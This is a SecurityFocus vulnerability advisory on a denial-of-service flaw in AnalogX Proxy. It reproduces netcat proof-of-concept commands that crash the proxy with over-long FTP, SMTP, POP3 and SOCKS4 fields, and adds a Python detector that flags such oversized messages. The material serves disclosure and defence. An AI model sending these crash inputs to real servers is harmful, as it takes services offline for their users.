AnalogX Proxy DoS Vulnerability

The Foundstone, Inc. advisory which reported this issue included the following instructions for demonstrating the problem. The full text of this advisory is available in the 'Credits' section of this vulnerability.

Proof of concept

Sending an FTP "USER" command containing approximately 370 or
more characters to the proxy server FTP TCP port 21 will crash
it.

Example #1: nc 192.168.1.2 21 < ftp.txt

Where ftp.txt contains:
"USER [long string of ~370 chars]@isp.com"

Sending an SMTP "HELO" command containing approximately 370 or
more characters to the proxy server SMTP TCP port 25 will
crash it.

Example #2: nc 192.168.1.2 25 < smtp.txt

Where smtp.txt contains:
"HELO [long string of ~370 chars]@isp.com"

Sending a POP3 "USER" command containing approximately 370 or
more characters to the proxy server POP3 TCP port 110 will
crash it.

Example #3: nc 192.168.1.2 110 < pop3.txt

Where pop3.txt contains:
"USER [long string of ~370 chars]@isp.com"

Sending a SOCKS4 "CONNECT" request with an overly large user
ID field of roughly 1800 characters or more to the proxy
server SOCKS TCP port 1080 will crash it.

Example #4: nc 192.168.1.2 1080 < socks.dat

Where socks.dat contains binary data with a user ID field of
approx. 1800 bytes.
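
A defender-side check for the pattern described above, as an added example that is not part of the advisory or of this page: it inspects the first client message on each affected port and reports over-long fields. The function name, the alert limits (set below the advisory's approximate lengths) and the sample messages are assumptions constructed for illustration.

```python
# Added example: flags client messages matching the advisory's oversized-field pattern.
# Limits are assumptions, set below the advisory's approximate lengths (~370 and ~1800).
TEXT_ARG_LIMIT = 300
SOCKS4_USERID_LIMIT = 1500

# Port -> command verb named in the advisory for that service.
TEXT_COMMANDS = {21: b"USER", 25: b"HELO", 110: b"USER"}


def oversized_field(port, payload):
    """Return (field_name, length) if the message carries an over-long field, else None."""
    if port in TEXT_COMMANDS:
        # Only the first line matters: verb, one space, then the argument.
        line = payload.split(b"\n", 1)[0].rstrip(b"\r")
        verb, _, arg = line.partition(b" ")
        if verb.upper() == TEXT_COMMANDS[port] and len(arg) >= TEXT_ARG_LIMIT:
            return (verb.upper().decode() + " argument", len(arg))
        return None
    if port == 1080:
        # SOCKS4 request layout: VN(1) CD(1) DSTPORT(2) DSTIP(4) USERID... NUL
        if len(payload) < 8 or payload[0] != 4 or payload[1] != 1:
            return None  # not a SOCKS4 CONNECT request
        userid = payload[8:].split(b"\x00", 1)[0]
        if len(userid) >= SOCKS4_USERID_LIMIT:
            return ("SOCKS4 user ID", len(userid))
    return None


# Constructed sample messages (not captured traffic).
SAMPLES = [
    (21, b"USER alice@isp.com\r\n"),
    (25, b"HELO " + b"A" * 370 + b"@isp.com\r\n"),
    (110, b"USER " + b"A" * 370 + b"@isp.com\r\n"),
    (1080, b"\x04\x01\x00\x50\xc0\xa8\x01\x02" + b"u" * 1800 + b"\x00"),
    (1080, b"\x04\x01\x00\x50\xc0\xa8\x01\x02" + b"bob\x00"),
]

if __name__ == "__main__":
    for port, msg in SAMPLES:
        print(port, oversized_field(port, msg))
```

The same length test can be enforced in front of the proxy (for example in a filtering relay) so that over-long fields are rejected before they reach the vulnerable service.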

Copyright 2010, SecurityFocus